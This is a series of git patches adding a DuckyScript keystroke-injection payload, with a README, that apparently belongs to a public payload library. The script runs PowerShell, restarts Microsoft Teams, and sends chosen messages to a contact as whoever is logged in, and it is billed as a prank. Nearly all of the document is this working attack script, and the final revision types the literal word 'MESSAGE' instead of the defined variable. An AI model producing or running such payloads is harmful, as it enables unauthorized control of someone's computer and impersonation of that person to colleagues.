From 4b369334743a1395eeb8aeacd08cc5b310c5999c Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 12:19:57 +0200 Subject: [PATCH 1/3] Send Messages In Teams --- .../execution/SendMessagesInTeams/payload.txt | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 payloads/library/execution/SendMessagesInTeams/payload.txt diff --git a/payloads/library/execution/SendMessagesInTeams/payload.txt b/payloads/library/execution/SendMessagesInTeams/payload.txt new file mode 100644 index 0000000..3ff4497 --- /dev/null +++ b/payloads/library/execution/SendMessagesInTeams/payload.txt @@ -0,0 +1,65 @@ +REM ########################################### +REM # | +REM # Title : Send Messages In Teams | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Prank | +REM # Target : Windows 10-11 | +REM # | +REM ########################################### + +REM Requirements: +REM - Microsoft Teams installed and user logged-in +REM - Internet Connection +REM - ExecutionPolicy Bypass +REM - Python + +REM 1. Open a powershell +REM 2. Close if Teams is opens and reopen it +REM 3. Goto search bar +REM 4. Search the person by name, email, id or what you want... +REM 5. Downarrow and enter to open the chat + +REM REQUIRED - Name, email, id or what you want for contact the target +DEFINE USER-ID example +REM REQUIRED - Messages +DEFINE MESSAGE1 example +REM ... +REM DEFINE MESSAGEN example.. + +DELAY 1000 +GUI r +DELAY 1000 +STRING powershell +ENTER +DELAY 2000 + +REM #### Powershell #### +STRINGLN Stop-Process -Name "Teams" +DELAY 1000 +STRINGLN Start-Process "$Env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams (work or school)" +REM It depends by the computer power +DELAY 10000 + +REM #### Teams #### +CTRL N +DELAY 2000 +STRING USER-ID +ENTER +DELAY 2000 +TAB +DELAY 1000 +TAB +DELAY 1000 + +REM #### Messages #### +STRING MESSAGE1 +ENTER +DELAY 1000 +REM ... +REM STRINGLN MESSAGEN + +DELAY 500 +ALT F4 +DELAY 500 +ALT F4 From 2c0be992fcec5046cf9454291fe570be00a1a6da Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 12:20:19 +0200 Subject: [PATCH 2/3] Create README.md --- .../execution/SendMessagesInTeams/README.md | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 payloads/library/execution/SendMessagesInTeams/README.md diff --git a/payloads/library/execution/SendMessagesInTeams/README.md b/payloads/library/execution/SendMessagesInTeams/README.md new file mode 100644 index 0000000..e584e52 --- /dev/null +++ b/payloads/library/execution/SendMessagesInTeams/README.md @@ -0,0 +1,24 @@ +# Send Messages In Teams + +A script used to prank your friends sending a message through the user Teams. + +**Category**: Prank + +## Description + +A script used to prank your friends sending a message through the user Teams. + +Open a PowerShell, stop Teams if is runned, run Teams, run new message function, search the receiver, write and send some messages, then close the app. + +## Getting Started + +### Dependencies + +* Internet Connection +* Microsoft Teams installed and user logged-in +* ExecutionPolicy Bypass +* Python + +### Settings + +- Setup the receiver From 8ae54723d664c9cb123214ef7a9a08440a8d5c41 Mon Sep 17 00:00:00 2001 From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com> Date: Mon, 12 Jun 2023 14:21:56 -0400 Subject: [PATCH 3/3] Update payload.txt --- .../execution/SendMessagesInTeams/payload.txt | 36 ++++++------------- 1 file changed, 10 insertions(+), 26 deletions(-) diff --git a/payloads/library/execution/SendMessagesInTeams/payload.txt b/payloads/library/execution/SendMessagesInTeams/payload.txt index 3ff4497..43794c9 100644 --- a/payloads/library/execution/SendMessagesInTeams/payload.txt +++ b/payloads/library/execution/SendMessagesInTeams/payload.txt @@ -21,45 +21,29 @@ REM 4. Search the person by name, email, id or what you want... REM 5. Downarrow and enter to open the chat REM REQUIRED - Name, email, id or what you want for contact the target -DEFINE USER-ID example -REM REQUIRED - Messages -DEFINE MESSAGE1 example -REM ... -REM DEFINE MESSAGEN example.. +DEFINE #USER example -DELAY 1000 +REM REQUIRED - Messages +DEFINE #MESSAGE example + +DEFAULT_DELAY 1000 GUI r -DELAY 1000 -STRING powershell -ENTER -DELAY 2000 +STRINGLN powershell REM #### Powershell #### STRINGLN Stop-Process -Name "Teams" -DELAY 1000 STRINGLN Start-Process "$Env:USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Teams (work or school)" + REM It depends by the computer power DELAY 10000 REM #### Teams #### CTRL N -DELAY 2000 -STRING USER-ID -ENTER -DELAY 2000 -TAB -DELAY 1000 -TAB -DELAY 1000 +STRINGLN #USER +REPEAT 2 TAB REM #### Messages #### -STRING MESSAGE1 -ENTER -DELAY 1000 -REM ... -REM STRINGLN MESSAGEN +STRINGLN MESSAGE -DELAY 500 ALT F4 -DELAY 500 ALT F4